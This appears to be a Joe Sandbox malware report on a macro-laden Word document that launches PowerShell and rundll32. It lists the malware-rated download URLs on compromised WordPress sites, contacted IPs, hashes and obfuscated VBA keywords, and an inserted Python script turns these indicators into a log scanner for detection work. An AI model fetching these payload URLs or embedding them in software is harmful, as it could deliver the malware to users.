  Malicious: true   Antivirus Detection: Avira URL Cloud: malware   Reputation: unknown

Name: http://ocsp.sectigo.com0
  Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp
  Malicious: false   Antivirus Detection: URL Reputation: safe   Reputation: unknown

Name: http://www.91yudao.com/wp-admin/KKHt1/
  Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp
  Malicious: true   Antivirus Detection: Avira URL Cloud: malware   Reputation: unknown

Name: http://seamart.info/alfacgiapi/q92A/
  Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp
  Malicious: true   Antivirus Detection: Avira URL Cloud: malware   Reputation: unknown

Name: http://yourcleanersurfaces.com
  Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp
  Malicious: true   Antivirus Detection: Avira URL Cloud: safe   Reputation: unknown

Name: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
  Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp
  Malicious: false   Antivirus Detection: URL Reputation: safe   Reputation: unknown

Name: http://www.hotmail.com/oe
  Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp
  Malicious: false   Antivirus Detection: -   Reputation: high

Name: https://rbdck.com/wp-content/uploads/sucuri/lewfK/
  Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp
  Malicious: true   Antivirus Detection: Avira URL Cloud: malware   Reputation: unknown

Name: http://laymancoder.com/rustic-decor-1gbad/Us/
  Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp
  Malicious: true   Antivirus Detection: Avira URL Cloud: malware   Reputation: unknown

Name: http://www.91yudao.com
  Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp
  Malicious: true   Antivirus Detection: Avira URL Cloud: safe   Reputation: unknown

Name: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
  Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp
  Malicious: false   Antivirus Detection: -   Reputation: high

Name: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
  Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp
  Malicious: false   Antivirus Detection: URL Reputation: safe   Reputation: unknown

Name: http://www.icra.org/vocabulary/.
  Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp
  Malicious: false   Antivirus Detection: URL Reputation: safe   Reputation: unknown

Name: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
  Source: powershell.exe, 00000005.00000002.2165767085.0000000002460000.00000002.00000001.sdmp
  Malicious: false   Antivirus Detection: -   Reputation: high

Name: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
  Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp
  Malicious: false   Antivirus Detection: URL Reputation: safe   Reputation: unknown

Name: http://investor.msn.com/
  Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp
  Malicious: false   Antivirus Detection: -   Reputation: high

Name: http://uagritech.com
  Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2169891604.0000000003BF2000.00000004.00000001.sdmp
  Malicious: true   Antivirus Detection: Avira URL Cloud: safe   Reputation: unknown

Name: http://seamart.info/alfacgiapi/q92A/P
  Source: powershell.exe, 00000005.00000002.2167131717.0000000002D44000.00000004.00000001.sdmp
  Malicious: true   Antivirus Detection: Avira URL Cloud: malware   Reputation: unknown

Name: https://sectigo.com/CPS0D
  Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp
  Malicious: false   Antivirus Detection: URL Reputation: safe   Reputation: unknown

Name: http://www.piriform.com/ccleaner
  Source: powershell.exe, 00000005.00000002.2155549875.0000000000294000.00000004.00000020.sdmp
  Malicious: false   Antivirus Detection: -   Reputation: high

Name: http://www.%s.comPA
  Source: powershell.exe, 00000005.00000002.2165767085.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2184265558.00000000027D0000.00000002.00000001.sdmp
  Malicious: false   Antivirus Detection: URL Reputation: safe   Reputation: low

Name: http://www.piriform.com/ccleanerv
  Source: powershell.exe, 00000005.00000002.2155549875.0000000000294000.00000004.00000020.sdmp
  Malicious: false   Antivirus Detection: -   Reputation: high

Contacted IPs

Public

IP               Domain   Country        ASN     ASN Name                                                   Malicious
23.227.169.146   unknown  United States  29802   HVC-AS (US)                                                true
162.241.253.129  unknown  United States  46606   UNIFIEDLAYER-AS-1 (US)                                     true
124.156.135.253  unknown  Singapore      132203  TENCENT-NET-AP-CN Tencent Building Kejizhongyi Avenue (CN)  true
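As an added example that is not part of the report, the following Python turns the URL, domain and IP tables above into a tiered indicator set and runs it over proxy log lines. It handles the carving artifact noted earlier by keying each URL on host plus directory prefix, so http://seamart.info/alfacgiapi/q92A/P and http://seamart.info/alfacgiapi/q92A/ become one indicator, and it grades hits as a download-path match, a host match, or a bare-IP match. The log format, the client addresses and the non-indicator destinations (RFC 5737 documentation addresses) are constructed assumptions; the indicators themselves are copied from the tables.

```python
"""Turn a sandbox report's URL and IP tables into a tiered indicator set and
scan proxy log lines with it."""
from __future__ import annotations

import ipaddress
from urllib.parse import urlsplit

# URL entries as the report lists them, with the verdict its URL scanners gave.
# Several were carved from process memory and carry adjacent bytes after the
# real URL (".../q92A/P", "ocsp.sectigo.com0"); url_key() absorbs that.
REPORT_URLS = {
    "http://uagritech.com/cgi-bin/a5G/": "malware",
    "http://uagritech.com/cgi-sys/suspendedpage.cgi": "safe",
    "http://www.91yudao.com/wp-admin/KKHt1/": "malware",
    "http://yourcleanersurfaces.com/four-monks-acasz/O2my/": "malware",
    "https://fifacoinsbox.com/wp-content/7gYt/": "malware",
    "http://seamart.info/alfacgiapi/q92A/": "malware",
    "http://seamart.info/alfacgiapi/q92A/P": "malware",
    "https://rbdck.com/wp-content/uploads/sucuri/lewfK/": "malware",
    "http://laymancoder.com/rustic-decor-1gbad/Us/": "malware",
    "http://ocsp.sectigo.com0": "safe",
}
# Hosts and IPs the sandbox actually talked to (Contacted Domains / Public IPs).
CONTACTED_HOSTS = {"uagritech.com", "www.91yudao.com", "yourcleanersurfaces.com"}
CONTACTED_IPS = {"162.241.253.129", "124.156.135.253", "23.227.169.146"}


def url_key(url: str) -> tuple[str, str]:
    """(host, directory prefix). The prefix is the path up to and including its
    last '/', so '.../q92A/P' and '.../q92A/' collapse onto one indicator."""
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower()
    path = parts.path or "/"
    return host, path[: path.rfind("/") + 1]


def build_indicators():
    """Three tiers: malware-rated download paths, every host involved, raw IPs."""
    paths = {url_key(u) for u, verdict in REPORT_URLS.items() if verdict == "malware"}
    hosts = {host for host, _ in paths} | CONTACTED_HOSTS
    ips = {ipaddress.ip_address(i) for i in CONTACTED_IPS}
    return paths, hosts, ips


def _as_ip(text: str | None):
    try:
        return ipaddress.ip_address(text) if text else None
    except ValueError:
        return None


def classify_request(url: str, dest_ip: str | None, indicators) -> str | None:
    """'url' for a hit on a malware-rated download path, 'host' for any other
    request to a known host, 'ip' for a direct-to-IP contact, None otherwise."""
    paths, hosts, ips = indicators
    host, prefix = url_key(url)
    if (host, prefix) in paths:
        return "url"
    if host in hosts:
        return "host"
    if _as_ip(dest_ip) in ips or _as_ip(host) in ips:
        return "ip"
    return None


# Constructed proxy log (not from the report): "timestamp client dest_ip method url status".
# Non-indicator destinations use RFC 5737 documentation addresses.
SAMPLE_PROXY_LOG = """\
2021-01-25T18:40:51Z 10.0.0.23 162.241.253.129 GET http://uagritech.com/cgi-bin/a5G/ 200
2021-01-25T18:40:52Z 10.0.0.23 162.241.253.129 GET http://uagritech.com/cgi-sys/suspendedpage.cgi 200
2021-01-25T18:40:55Z 10.0.0.23 124.156.135.253 GET http://www.91yudao.com/wp-admin/KKHt1/ 200
2021-01-25T18:41:03Z 10.0.0.23 23.227.169.146 GET http://yourcleanersurfaces.com/four-monks-acasz/O2my/ 200
2021-01-25T18:41:10Z 10.0.0.44 23.227.169.146 GET http://23.227.169.146/ 404
2021-01-25T18:41:12Z 10.0.0.44 198.51.100.7 GET http://ocsp.sectigo.com/ 200
2021-01-25T18:41:20Z 10.0.0.44 203.0.113.9 GET http://www.example.com/index.html 200
"""


def scan_log(text: str, indicators=None) -> list[tuple[str, str, str]]:
    """(timestamp, tier, url) for every log line that hits an indicator."""
    indicators = indicators or build_indicators()
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue
        ts, _client, dest_ip, _method, url, _status = fields[:6]
        tier = classify_request(url, dest_ip, indicators)
        if tier:
            hits.append((ts, tier, url))
    return hits


if __name__ == "__main__":
    for ts, tier, url in scan_log(SAMPLE_PROXY_LOG):
        print(f"{ts} {tier:4} {url}")
```

Note that the request for the cPanel suspended page comes back as a host-level hit rather than a download-path hit: the host is still part of the campaign's infrastructure even though that particular URL is rated safe, and the legitimate Sectigo OCSP request produces no hit at all because the carved "ocsp.sectigo.com0" string is rated safe and never enters the indicator set.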

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 343897
Start date: 25.01.2021
Start time: 18:39:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 21s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Mensaje-22-012021.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@44/8@4/3
EGA Information:
• Successful, ratio: 94.7%
HDC Information:
• Successful, ratio: 29.2% (good quality ratio 21.2%)
• Quality average: 59.5%
• Quality standard deviation: 38%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• TCP Packets have been reduced to 100
• Execution Graph export aborted for target powershell.exe, PID 2324 because it is empty
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

This is a light report that stopped on timeout and was truncated for size, so the behavior sections are incomplete; the absence of an entry here (for example the zero injected processes) is not evidence that the behavior did not occur.

Simulations

Behavior and APIs

Time      Type             Description
18:40:43  API Interceptor  1x Sleep call for process: msg.exe modified
18:40:44  API Interceptor  225x Sleep call for process: powershell.exe modified
18:41:25  API Interceptor  57x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match            Associated Sample Name / URL  Detection  Context
162.241.253.129  file.doc                      malicious  uagritech.com/cgi-sys/suspendedpage.cgi
                 file-2021-7_86628.doc         malicious  uagritech.com/cgi-bin/a5G/
124.156.135.253  file.doc                      malicious  www.91yudao.com/wp-admin/KKHt1/

Domains

Match            Associated Sample Name / URL  Detection  Context
uagritech.com    file-2021-7_86628.doc         malicious  162.241.253.129
www.91yudao.com  file.doc                      malicious  124.156.135.253

ASN

All associated analyses below carry the detection "malicious".

Match: TENCENT-NET-AP-CN Tencent Building Kejizhongyi Avenue (CN)
  Associated Sample Name / URL                                            Context
  certificado.doc                                                         101.32.209.55
  file.doc                                                                124.156.135.253
  IFS_1.0.69.apk                                                          129.226.103.217
  IFS_1.0.69.apk                                                          129.226.103.12
  adware_beauty.apk                                                       129.226.103.217
  flashplayerpp_install_cn (1).exe                                        211.152.136.89
  Mv Maersk Kleven V949E_pdf.exe                                          119.28.17.183
  Doc.doc                                                                 124.156.117.232
  JI35907_2020.doc                                                        124.156.117.232
  DATI 2020.doc                                                           124.156.117.232
  TZ8322852306TL.doc                                                      129.226.14.227
  http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/       129.226.14.227
  http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/       129.226.14.227
  M9SEr6SviK                                                              129.226.106.211
  Vu13RUIso4                                                              49.51.74.60
  http://down.qq.com/lol/full/4218/LOL_V4.2.1.8_FULL.7z.003               203.205.137.29
  egint_cryptor.exe                                                       170.106.35.220
  http://150.109.170.185                                                  150.109.170.185
  inv_112020_65098.exe                                                    170.106.35.220
  IKatdK48H3.exe                                                          170.106.35.220

Match: UNIFIEDLAYER-AS-1 (US)
  Associated Sample Name / URL                                            Context
  INV5949.xls                                                             192.232.216.109
  DOCUMENTS_RECEIVED.html                                                 192.185.112.211
  INV 5047.xls                                                            192.185.217.211
  FP4554867134UQ.doc                                                      192.232.250.227
  MENSAJE.doc                                                             192.185.52.115
  MENSAJE.doc                                                             192.185.52.115
  Archivo_AB-96114571.doc                                                 192.185.52.115
  1_25_2021 11_20_30 a.m., [Payment 457 CMSupportDev].html                50.87.150.0
  5390080_2021_1-259043.doc                                               192.185.52.115
  5390080_2021_1-259043.doc                                               192.185.52.115
  request_form_1611565093.xlsm                                            50.87.232.245
  documents_0084568546754.exe                                             108.179.242.70
  mr kesh.exe                                                             108.167.136.53
  79a2gzs3gkk.doc                                                         162.241.224.176
  INFO.doc                                                                162.241.224.176
  Electronic form.doc                                                     192.232.250.227
  file.doc                                                                162.241.253.129
  Payment_[Ref 72630 - joe.blow].html                                     50.87.150.0
  Payment _Arabian Parts Co BSC©.exe                                      74.220.199.6
  request_form_1611306935.xlsm                                            162.241.225.18

Match: HVC-AS (US)
  Associated Sample Name / URL                                            Context
  57229937-122020-4-7676523.doc                                           23.111.174.153
  Qt_1186.xls                                                             96.31.77.143
  Qt_1186.xls                                                             96.31.77.143
  dGWioTejLEz0eVM.exe                                                     162.252.80.144
  9tyZf93qRdNHfVw.exe                                                     162.252.80.144
  BANK SLIP.exe                                                           104.156.59.2
  5YfNeXk1f0wrxXm.exe                                                     37.1.210.155
  15012021.exe                                                            23.111.136.146
  urgent specification request.exe                                        23.111.136.146
  P396143.htm                                                             23.111.188.5
  SCAN_20210112_132640143,pdf.exe                                         199.193.115.48
  P166824.htm                                                             23.111.188.5
  Archivo_122020_1977149.doc                                              23.111.174.153
  H56P7iDwnJ.doc                                                          162.254.150.6
  0939489392303224233.exe                                                 194.126.175.2
  RFQ-B201902-0064.exe                                                    103.28.70.234
  ar208.exe                                                               37.1.210.208
  ar208.exe                                                               37.1.210.208
  QC679594 3012 2020 384-7560.doc                                         23.111.174.153
  FILE 20201230 XC25584.doc                                               23.111.174.153

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{51E1E6FE-FC7D-43F0-B5EC-EA333295AFA3}.tmp
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1024
                                        Entropy (8bit):0.05390218305374581
                                        Encrypted:false
                                        SSDEEP:3:ol3lYdn:4Wn
                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DFD62553-3B39-4424-842F-0904C3CEBA38}.tmp
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1536
                                        Entropy (8bit):1.3554734412254812
                                        Encrypted:false
                                        SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb2:IiiiiiiiiifdLloZQc8++lsJe1MzoC/
                                        MD5:7441DC2B308CCCA699850EA3301EF411
                                        SHA1:88175ECF2F2B60C85B6E91FB9685165ECD4E2A1F
                                        SHA-256:27A92CEB09BC5358622DCDF1015A0C369E8C4AF6EF838B2450F05DD2151900FC
                                        SHA-512:068E16D21F1C3416E3968CAE151B9DB96980B521D90378DB7578F2FC2B19BF96DE4DDA199AFD5BA6E704DBFD6BFF5B6B6020EE3259DA204E017CEA650BDDEBF5
                                        Malicious:false
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Mensaje-22-012021.LNK
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Tue Jan 26 01:40:40 2021, length=169472, window=hide
                                        Category:dropped
                                        Size (bytes):2098
                                        Entropy (8bit):4.519328285853816
                                        Encrypted:false
                                        SSDEEP:48:82f/XTFGq9bhqSr1qQh22f/XTFGq9bhqSr1qQ/:88/XJGqxESrAQh28/XJGqxESrAQ/
                                        MD5:B66DF24DB1A4F422A00793330B83B195
                                        SHA1:3A2DECDBC95A337172C24E70E9313304EAFB3E6B
                                        SHA-256:043EDF5F3E8BA4642E208E8D97DFACB24AC3074EFBF9357CDDC8225FF7B9ED6D
                                        SHA-512:2D6E7FD002455B7402A2B1B11F102BB8B928965C904B1EB116EEDD38286577E163989466B325FEA2A1A6BA69E561978DF3BBDADB289468D618F4CED2A93F701D
                                        Malicious:false
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):89
                                        Entropy (8bit):4.2415047118077025
                                        Encrypted:false
                                        SSDEEP:3:M1JTlpplwAimlpplmX1JTlpplv:MZmWg1
                                        MD5:1B34D9FDE85A5BC6CE047DEF3971FFAD
                                        SHA1:6849AD57B070DBCF7F452E98D1F3623330718995
                                        SHA-256:B5C73D522CBF336789E5EF81A7EC5ADECA0112CDDA1E6F503C7BCABD959F1BA8
                                        SHA-512:B875A2B751670FAB1C066066CA8DF4F044D0C070137B5B9B14CBB6F8A3450C0040844D362907EC4EBDD8077A230CFE187A70F8CF001C08A519FBFDFDA3AA39D8
                                        Malicious:false
                                        Preview: [doc]..Mensaje-22-012021.LNK=0..Mensaje-22-012021.LNK=0..[doc]..Mensaje-22-012021.LNK=0..
                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.431160061181642
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                        MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                        SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                        SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                        SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                        Malicious:false
                                        Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2H6MO9GWQ13A7WY0W5E0.temp
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):8016
                                        Entropy (8bit):3.5893053421452628
                                        Encrypted:false
                                        SSDEEP:96:chQCsMqaqvsqvJCwoVAz8hQCsMqaqvsEHyqvJCworLAz2YYXHiAf8H7lUVnAIu:cyzoVAz8ynHnorLAz2uAf8HkAIu
                                        MD5:48F72281BAAEF84031FBFA8EEB2920BA
                                        SHA1:558DE5636D881A0CEA20D93578A231B13801AEF1
                                        SHA-256:CF8C8B174BA4A3C67C9DC93E6D1678035AE0C163B20EE5A126D0E62F92E7C963
                                        SHA-512:649CFC47AE559E65271C80B31993D0B2B9D060EBCDC5473216562D56CE409BCB49A105E6A6F720CDFF3748D8E160006411744DB0650CA90A922F943452B4EB5D
                                        Malicious:false
                                        C:\Users\user\Desktop\~$nsaje-22-012021.doc
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.431160061181642
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                        MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                        SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                        SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                        SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                        Malicious:false
                                        Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                        C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):362268
                                        Entropy (8bit):4.387595476678939
                                        Encrypted:false
                                        SSDEEP:3072:x82jpiC2JG7HZb7XWQml/jz8A4diTE90Q6kF4CK/R2S2:S2L7HN7Kl/jLA90QECkRN2
                                        MD5:F0B8807DD850DB30EA70918CD87BB302
                                        SHA1:BAE31F0C5B9167AA4B82EAFE396725DD2429388F
                                        SHA-256:707504760B76AA8D62C2B99C8884352CF94D11A50D2E1D63E5F0B4B615DBE58B
                                        SHA-512:723C96AB71A52ABBA13B1DE82B520D1B7676C6001E2336EF1723C90794D8318320B9A41D1101FBB77A1C1BD11017BEF2BAC127FE7BAD0138C3AD146EE3462F52
                                        Malicious:true
                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

                                        Static File Info

                                        General

                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: SQL proactive Tools & Tools user-centric Electronics RSS withdrawal Movies, Garden & Clothing Beauty Unbranded Fresh Mouse bluetooth e-enable HDD, Author: Emilio Soria, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 22 08:23:00 2021, Last Saved Time/Date: Fri Jan 22 08:23:00 2021, Number of Pages: 1, Number of Words: 4188, Number of Characters: 23877, Security: 8
                                        Entropy (8bit):6.627511981709601
                                        TrID:
                                        • Microsoft Word document (32009/1) 79.99%
                                        • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                        File name:Mensaje-22-012021.doc
                                        File size:168960
                                        MD5:5023f52efbf71865041baf66ae8411cb
                                        SHA1:dc2aabc9b019199d32c000a8e18e63cafa4fbfd3
                                        SHA256:f4f41ebd2b517564f8764fa21faa2b1a824694e29cb31a2f149245e7bd42ab24
                                        SHA512:3c9a1b8c7d09872fcd4ce6e6b49e5326deb07df56ec552a6c85767e669c4ef705566c43af48fcf39ddc3f00e4ce416d7c12642690b41d4bbb2a72924ee86556a
                                        SSDEEP:3072:5wT4OLiSTS0reTrsbRKyLHCaoyss/j8jsIWFiccn52fbbiqUYbdYPeFmfG5/+vGa:5wT4OLiSTS0reTrsbRKyLHCpqIgDFr/b

                                        File Icon

                                        Icon Hash:e4eea2aaa4b4b4a4

                                        Static OLE Info

                                        General

                                        Document Type:OLE
                                        Number of OLE Files:1

                                        OLE File "Mensaje-22-012021.doc"

                                        Indicators

                                        Has Summary Info:True
                                        Application Name:Microsoft Office Word
                                        Encrypted Document:False
                                        Contains Word Document Stream:True
                                        Contains Workbook/Book Stream:False
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:
                                        Flash Objects Count:
                                        Contains VBA Macros:True

                                        Summary

                                        Code Page:1252
                                        Title:
                                        Subject:SQL proactive Tools & Tools user-centric Electronics RSS withdrawal Movies, Garden & Clothing Beauty Unbranded Fresh Mouse bluetooth e-enable HDD
                                        Author:Emilio Soria
                                        Keywords:
                                        Comments:
                                        Template:Normal.dotm
                                        Last Saved By:
                                        Revision Number:1
                                        Total Edit Time:0
                                        Create Time:2021-01-22 08:23:00
                                        Last Saved Time:2021-01-22 08:23:00
                                        Number of Pages:1
                                        Number of Words:4188
                                        Number of Characters:23877
                                        Creating Application:Microsoft Office Word
                                        Security:8

                                        Document Summary

                                        Document Code Page:-535
                                        Number of Lines:198
                                        Number of Paragraphs:56
                                        Thumbnail Scaling Desired:False
                                        Company:
                                        Contains Dirty Links:False
                                        Shared Document:False
                                        Changed Hyperlinks:False
                                        Application Version:917504

                                        Streams with VBA

                                        VBA File Name: Abljqxjkbk2vy_lwk, Stream Size: 704
                                        General
                                        Stream Path:Macros/VBA/Abljqxjkbk2vy_lwk
                                        VBA File Name:Abljqxjkbk2vy_lwk
                                        Stream Size:704

                                        VBA Code Keywords

                                        Keyword
                                        Attribute
                                        VB_Name
                                        VBA Code
                                        VBA File Name: G8g2gkh6bwry__ui, Stream Size: 25145
                                        General
                                        Stream Path:Macros/VBA/G8g2gkh6bwry__ui
                                        VBA File Name:G8g2gkh6bwry__ui
                                        Stream Size:25145

                                        VBA Code Keywords

                                        Keyword
                                        TyDxBSIdA
                                        rJumAGpCU
                                        POCPCR
                                        MidB$(fxXYAMVdF,
                                        WLHzhZ()
                                        ZleRMqC
                                        Mid(Application.Name,
                                        MKOkAkDEA
                                        iwKTZKXhU
                                        kfjcECA
                                        mdTlBB
                                        rJumAGpCU,
                                        nnlZQJ(tdXEHJ)
                                        sSrGGR:
                                        (eYEjFQDJ
                                        ZkJzCh
                                        UBound(LHEHF)
                                        RyCWCBYIH,
                                        BsOFD
                                        UBound(kfjcECA)
                                        CAlyYGB
                                        (HTbrA
                                        UBound(VDHdFe)
                                        UBound(wegaJFI)
                                        (dQxQHD
                                        uuvyPZHIG.Range
                                        cvaip:
                                        SZReI()
                                        XlvjIkDRm.Range
                                        zBkPfohF,
                                        eYEjFQDJ
                                        tiGZxsJvH
                                        VVTbccCG,
                                        DcXNSh
                                        lscvJD
                                        (kIvjrjw
                                        ZODWBsEBI
                                        Attribute
                                        VReCHAiRJ.Range
                                        LwirJwf,
                                        (uwchBBD
                                        wegaJFI()
                                        tBeDiDD
                                        IcFSF
                                        fdZhB,
                                        lLxOEH
                                        RbMyeP()
                                        tgwzEB:
                                        HTbrA
                                        "sadsaccc"
                                        "sasdsacc"
                                        (fdZhB
                                        RvTnG:
                                        sSrGGR
                                        YTtAAI
                                        LuszFqPBe
                                        QJnPD.Range
                                        gsTJBDF
                                        vezoZEF
                                        GWccvBGM
                                        bDcyAJPCF
                                        LwirJwf
                                        RuvvQGCA
                                        WLHzhZ(ZkJzCh)
                                        MidB$(FIGYEGhf,
                                        ZTyEBE
                                        TjPUUD,
                                        WLHzhZ
